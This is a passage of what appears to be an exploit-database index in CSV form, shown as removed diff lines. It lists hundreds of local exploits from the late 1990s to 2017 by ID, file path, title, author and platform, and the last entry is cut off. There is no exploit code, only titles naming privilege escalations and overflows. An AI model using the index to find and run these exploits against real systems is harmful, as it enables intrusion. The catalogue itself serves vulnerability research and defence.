-19804,exploits/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local, -19811,exploits/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (1)",2000-03-13,funkysh,linux,local, -19812,exploits/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (2)",2000-03-13,"S. Krahmer & Stealth",linux,local, -19813,exploits/linux/local/19813.txt,"Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Local Privilege Escalation",2000-03-16,Sebastian,linux,local, -19816,exploits/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local, -19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local, -19823,exploits/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Command Execution",2000-03-24,kadokev,unix,local, -19836,exploits/windows/local/19836.c,"Symantec pcAnywhere 9.0 - Weak Encryption",2000-04-06,"Pascal Longpre",windows,local, -19837,exploits/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 - Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local, -19838,exploits/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,linux,local, -19839,exploits/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,windows,local, -19840,exploits/beos/local/19840.txt,"Be BeOS 4.5/5.0 - Invalid System Call",2000-04-10,"Konstantin Boldyshev",beos,local, -19841,exploits/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 - IP Packet Length Field",2000-04-07,"Tim Newsham",beos,local, -19851,exploits/qnx/local/19851.c,"QSSL QNX 4.25 A - 'crypt()' Local Privilege Escalation",2000-04-15,Sean,qnx,local, -19855,exploits/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local, -19904,exploits/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",unix,local, -19867,exploits/linux/local/19867.txt,"SuSE Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local, -19872,exploits/solaris/local/19872.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)",2000-04-24,DiGiT,solaris,local, -19873,exploits/solaris/local/19873.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local, -19874,exploits/solaris/local/19874.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local, -19875,exploits/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 - Cleartext Passwords",2000-04-23,"Robert van der Meulen",immunix,local, -19876,exploits/solaris/local/19876.c,"Solaris 7.0/8 - Xsun Buffer Overrun",2000-04-24,DiGiT,solaris,local, -19878,exploits/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,solaris,local, -19883,exploits/linux/local/19883.c,"SuSE Linux 6.3/6.4 Gnomelib - Local Buffer Overflow",2000-04-29,bladi,linux,local, -19894,exploits/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 - eToken PIN Extraction",2000-05-04,kingpin,windows,local, -19900,exploits/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout",2000-05-03,"Michal Zalewski",linux,local, -19910,exploits/solaris/local/19910.c,"Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)",1999-05-23,ADM,solaris,local, -19911,exploits/solaris/local/19911.c,"Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)",1999-03-04,ADM,solaris,local, -19912,exploits/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink",2000-05-10,foo,multiple,local, -19915,exploits/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local, -19925,exploits/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Local Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local, -19930,exploits/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local, -19933,exploits/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local, -19946,exploits/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local, -19952,exploits/linux/local/19952.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local, -19953,exploits/linux/local/19953.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (2)",2000-05-22,Scrippie,linux,local, -19954,exploits/linux/local/19954.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)",2000-05-22,WaR,linux,local, -19955,exploits/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local, -19967,exploits/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local, -19968,exploits/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local, -19969,exploits/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Local Buffer Overflow",2000-05-29,noir,linux,local, -19970,exploits/linux/local/19970.c,"KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local, -19971,exploits/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (1)",2000-05-07,Scrippie,unix,local, -19972,exploits/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local, -19979,exploits/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (1)",2000-05-31,kil3r,linux,local, -19980,exploits/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)",2000-05-31,kil3r,linux,local, -19981,exploits/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (3)",2000-05-31,IhaQueR,linux,local, -19989,exploits/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local, -19990,exploits/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink",2000-06-02,"Jason Axley",hp-ux,local, -19991,exploits/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Local Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local, -19992,exploits/linux/local/19992.c,"mailx 8.1.1-10 (BSD/Slackware) - Local Buffer Overflow (2)",1999-07-03,funkysh,linux,local, -19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local, -19999,exploits/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local, -20000,exploits/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local, -20001,exploits/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local, -20002,exploits/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - '.SNMPD' File Permission",2000-06-07,loveyou,hp-ux,local, -20003,exploits/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local, -20004,exploits/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local, -20012,exploits/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local, -20013,exploits/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Local Buffer Overflow",2000-06-01,Syzop,linux,local, -20014,exploits/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore - Local Buffer Overflow",2000-06-14,"Job de Haas of ITSX",solaris,local, -20018,exploits/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 - File Permission",2000-06-16,"Dixie Flatline",solaris,local, -20021,exploits/linux/local/20021.txt,"RedHat 6.2 - Piranha Virtual Server Package Plaintext Password",2000-06-09,arkth,linux,local, -20022,exploits/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local, -20024,exploits/linux/local/20024.c,"Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - '/usr/bin/fld' Input File Overflow",2000-08-01,E-Ligth,linux,local, -20036,exploits/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,windows,local, -20042,exploits/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",unix,local, -20045,exploits/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption",2000-06-19,"Chris Evans",linux,local, -20053,exploits/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' File DEP Bypass",2012-07-23,"Daniel Romero",windows,local, -20056,exploits/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local, -20058,exploits/unix/local/20058.pl,"Visible Systems Razor 4.1 - Password File (2)",2000-06-15,"Shawn A. Clifford",unix,local, -20073,exploits/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution",2000-07-12,"Joey Hess",unix,local, -20081,exploits/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local, -20092,exploits/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local, -20093,exploits/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local, -20107,exploits/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local, -20108,exploits/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - 'Checkin.prog' Binary Execution",2000-06-28,"Tanaka Akira",unix,local, -20116,exploits/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local, -20126,exploits/irix/local/20126.c,"IRIX 6.5.x - '/usr/sbin/gr_osview' Local Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local, -20127,exploits/irix/local/20127.c,"SGI IRIX 6.2 - 'libgl.so' Local Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local, -20128,exploits/irix/local/20128.c,"IRIX 6.5.x - '/usr/sbin/dmplay' Local Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local, -20129,exploits/irix/local/20129.c,"IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local, -20130,exploits/irix/local/20130.c,"IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition",2000-01-01,"Last Stage of Delirium",irix,local, -20133,exploits/windows/local/20133.cpp,"Microsoft Windows Server 2000 - Named Pipes Predictability",2000-08-01,Maceo,windows,local, -20137,exploits/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local, -20138,exploits/irix/local/20138.c,"IRIX 5.3/6.x - '/usr/bin/mail' Local Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local, -20141,exploits/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local, -20142,exploits/linux/local/20142.sh,"SUIDPerl 5.00503 - Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",linux,local, -20147,exploits/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool",2000-08-02,suid,solaris,local, -20153,exploits/unix/local/20153.c,"David Bagley xlock 4.16 - User Supplied Format String (1)",2000-08-15,noir,unix,local, -20154,exploits/unix/local/20154.c,"David Bagley xlock 4.16 - User Supplied Format String (2)",2000-10-21,"Ben Williams",unix,local, -20155,exploits/linux/local/20155.txt,"Multisoft FlagShip 4.4 - Installation Permission",2000-08-10,Narrow,linux,local, -20160,exploits/linux/local/20160.txt,"Minicom 1.82/1.83 - Capture-file Group Ownership",2000-08-19,"Michal Zalewski",linux,local, -20162,exploits/hp-ux/local/20162.txt,"HP-UX 11.0 - net.init RC Script",2000-08-22,"Kyong-won Cho",hp-ux,local, -20179,exploits/unix/local/20179.txt,"Gert Doering mgetty 1.1.19/1.1.20/1.1.21/1.22.8 - Symbolic Link Traversal",2000-08-25,"Stan Bubrouski",unix,local, -20185,exploits/linux/local/20185.c,"RedHat 6 GLIBC/locale - Subsystem Format String",2000-09-06,warning3,linux,local, -20186,exploits/solaris/local/20186.c,"Solaris 2.6/7.0 /locale - Subsystem Format String",2000-11-02,warning3,solaris,local, -20187,exploits/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local, -20188,exploits/solaris/local/20188.c,"Solaris 2.6/7.0 'eject' locale - Subsystem Format String",2000-09-08,warning3,solaris,local, -20189,exploits/unix/local/20189.c,"Libc locale - Local Privilege Escalation (1)",2000-09-04,Synnergy.net,unix,local, -20190,exploits/unix/local/20190.c,"Libc locale - Local Privilege Escalation (2)",2000-09-04,anonymous,unix,local, -20191,exploits/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local, -20193,exploits/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",unix,local, -20201,exploits/linux/local/20201.c,"Nvidia Linux Driver - Local Privilege Escalation",2012-08-02,anonymous,linux,local, -20209,exploits/windows/local/20209.cpp,"Microsoft Windows Server 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local, -20212,exploits/unix/local/20212.txt,"GNOME esound 0.2.19 - Unix Domain Socket Race Condition",2000-08-31,"Kris Kennaway",unix,local, -20213,exploits/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local, -20542,exploits/windows/local/20542.rb,"GlobalScape CuteZIP - Local Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local, -20230,exploits/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Local Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local, -20232,exploits/windows/local/20232.cpp,"Microsoft Windows NT 4.0/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local, -20241,exploits/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local, -20250,exploits/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local, -20251,exploits/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local, -20252,exploits/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local, -20256,exploits/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,openbsd,local, -20257,exploits/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local, -20543,exploits/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local, -20262,exploits/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local, -20263,exploits/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local, -20265,exploits/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local, -20274,exploits/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local, -20275,exploits/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local, -20276,exploits/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Local Privilege Escalation",2000-10-10,@stake,solaris,local, -20285,exploits/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local, -20290,exploits/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local, -20291,exploits/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",linux,local, -20294,exploits/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 - Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",unix,local, -20296,exploits/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass)",2012-08-06,"Robert Larsen",windows,local, -40428,exploits/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local, -20312,exploits/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap",2000-10-18,"Juan Manuel Pascual Escribá",linux,local, -20316,exploits/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local, -20317,exploits/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local, -20326,exploits/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local, -20329,exploits/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File",2000-10-20,"Kyong-won Cho",hp-ux,local, -20333,exploits/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Local Overflow",1997-07-21,"D. J. Bernstein",unix,local, -20338,exploits/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local, -20339,exploits/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local, -20341,exploits/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local, -20377,exploits/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,freebsd,local, -20378,exploits/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local, -20380,exploits/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local, -20381,exploits/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local, -20382,exploits/unix/local/20382.pl,"Debian 2.x / RedHat 6.2 / IRIX 5/6 / Solaris 2.x - Mail Reply-To Field",2000-11-01,"Gregory Duchemin",unix,local, -20383,exploits/windows/local/20383.txt,"Microsoft IIS 4.0 - ISAPI Buffer Overflow",2000-11-06,"Marc Maiffret",windows,local, -20385,exploits/linux/local/20385.sh,"RedHat 0.4 b15 restore - Insecure Environment Variables",2000-11-04,fish,linux,local, -20386,exploits/hp-ux/local/20386.txt,"HP-UX 10.20 - registrar Local Arbitrary File Read",2000-11-08,"J.A. Gutierrez",hp-ux,local, -20396,exploits/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local, -40427,exploits/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local, -20401,exploits/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local, -20402,exploits/linux/local/20402.sh,"Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local, -20407,exploits/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local, -20409,exploits/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local, -20410,exploits/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - 'Svgalib' Local Buffer Overflow",2000-11-20,Synnergy.net,unix,local, -20411,exploits/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local, -41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",windows,local, -20417,exploits/osx/local/20417.c,"Tunnelblick - Local Privilege Escalation (1)",2012-08-11,zx2c4,osx,local, -20418,exploits/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local, -20436,exploits/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local, -20443,exploits/osx/local/20443.sh,"Tunnelblick - Local Privilege Escalation (2)",2012-08-11,zx2c4,osx,local, -20451,exploits/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local, -20452,exploits/aix/local/20452.c,"IBM AIX 4.x - '/usr/bin/setsenv' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local, -20453,exploits/aix/local/20453.c,"IBM AIX 4.3 - '/usr/lib/lpd/digest' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local, -20454,exploits/aix/local/20454.sh,"IBM AIX 4.x - 'enq' Local Buffer Overflow",2003-04-24,watercloud,aix,local, -20455,exploits/aix/local/20455.c,"IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Local Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local, -20456,exploits/windows/local/20456.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_showcolv Buffer Overflow",2000-12-01,"David Litchfield",windows,local, -20457,exploits/windows/local/20457.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_peekqueue Buffer Overflow",2000-12-01,@stake,windows,local, -20458,exploits/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local, -20485,exploits/osx/local/20485.sh,"Viscosity - Local Privilege Escalation",2012-08-13,zx2c4,osx,local, -20493,exploits/linux/local/20493.sh,"University of Washington Pico 3.x/4.x - File Overwrite",2000-12-11,mat,linux,local, -20505,exploits/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 - PIN Brute Force",2000-12-14,@stake,palm_os,local, -20514,exploits/solaris/local/20514.pl,"Solaris 2.5.1/2.6/7.0/8 - patchadd Race Condition",2000-12-18,"Larry W. Cashdollar",solaris,local, -20517,exploits/linux/local/20517.c,"Itetris 1.6.1/1.6.2 - Privileged Arbitrary Command Execution",2000-12-19,V9,linux,local, -20520,exploits/solaris/local/20520.pl,"Solaris 2.x/7.0/8 - 'Catman' Race Condition (1)",2000-11-21,"Vapid Labs",solaris,local, -20521,exploits/solaris/local/20521.pl,"Solaris 2.x/7.0/8 - 'Catman' Race Condition (2)",2000-11-21,"Vapid Labs",solaris,local, -20526,exploits/unix/local/20526.c,"GTK+ 1.2.8 - Arbitrary Loadable Module Execution",2001-01-02,V9,unix,local, -20554,exploits/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local, -20555,exploits/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local, -20556,exploits/linux/local/20556.c,"Debian 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local, -20560,exploits/unix/local/20560.c,"SSH 1.2.x - Secure-RPC Weak Encrypted Authentication",2001-01-16,"Richard Silverman",unix,local, -20581,exploits/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local, -20585,exploits/windows/local/20585.txt,"LocalWEB2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local, -20603,exploits/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local, -20604,exploits/linux/local/20604.sh,"Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local, -20621,exploits/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local, -20626,exploits/linux/local/20626.c,"Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)",2001-02-09,"Chris Evans",linux,local, -20645,exploits/linux/local/20645.c,"Elm 2.5.3 - Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local, -20651,exploits/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal",2001-02-28,joetesta,windows,local, -20658,exploits/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local, -20678,exploits/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Local Buffer Overflow (1)",2001-03-08,anonymous,unix,local, -20679,exploits/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Local Buffer Overflow (2)",2001-03-08,"the itch",unix,local, -40426,exploits/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,windows,local, -20684,exploits/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip - Local Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local, -20691,exploits/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow",2001-03-13,"Frank DENIS",linux,local, -20697,exploits/unix/local/20697.c,"DG/UX 4.20 lpsched - 'Error Message' Local Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local, -20715,exploits/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,solaris,local, -20718,exploits/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local, -20720,exploits/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local, -20721,exploits/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local, -40425,exploits/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local, -20724,exploits/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local, -20740,exploits/solaris/local/20740.c,"Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local, -20741,exploits/solaris/local/20741.c,"Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)",2001-04-09,"Adam Slattery",solaris,local, -20743,exploits/solaris/local/20743.c,"Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow",2001-04-10,"Riley 